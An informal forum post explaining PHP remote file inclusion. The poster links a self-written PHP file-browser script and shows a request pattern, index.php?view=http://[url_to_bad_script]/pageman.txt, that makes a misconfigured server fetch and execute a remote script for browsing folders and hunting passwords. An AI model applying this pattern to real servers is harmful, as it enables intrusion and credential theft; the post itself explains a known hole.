mm, so far no 'enemy' cracked. but i guess, it depends on the hostility.
During my military service, i learned to counter means by same means. like if somebody beats you, you have not right of shooting him.
well, TimSSC,what I actually wanted to tell you is, he might have gotten access to some webserver you've been running, or at least, upload php-script to it or remotely execute it.
see, that is the script I used:
http://www-users.rwth-aachen.de/gunther ... ageman.zip
with this script, you can browse trough pretty much folders on the server, as it only requires read access for the webserver, which means, if you have stuff chmoded with 664, you can read it.
I wrote this script, as a(nother) friend of mine showed me a security issue which you get, if you have a php-script which includes others, and it isn't done right.
if you set some wrong variables in your php.ini (something with fopen_allow and from some url) and a script, which is called like index.php?view=http://[url_to_bad_script]/pageman.txt, the attacker may be able to execute this script, like you installed it on your webserver.
well, and if this hacker is looking for some passwords on the server, is probably looking trough a couple of folders, and if wants a complete file list of all files you have got there, he probably causes some disk i/o. And on rather old hardware ( i simple assume it ), it could take a while.
I hope, by posting this, I'm not causing to much trouble around the globe, as you start trying this script on every server. It was originally intended, to fix file permissions on my webspace, which you couldn't set via webdav, and later on, backing up the database of mine.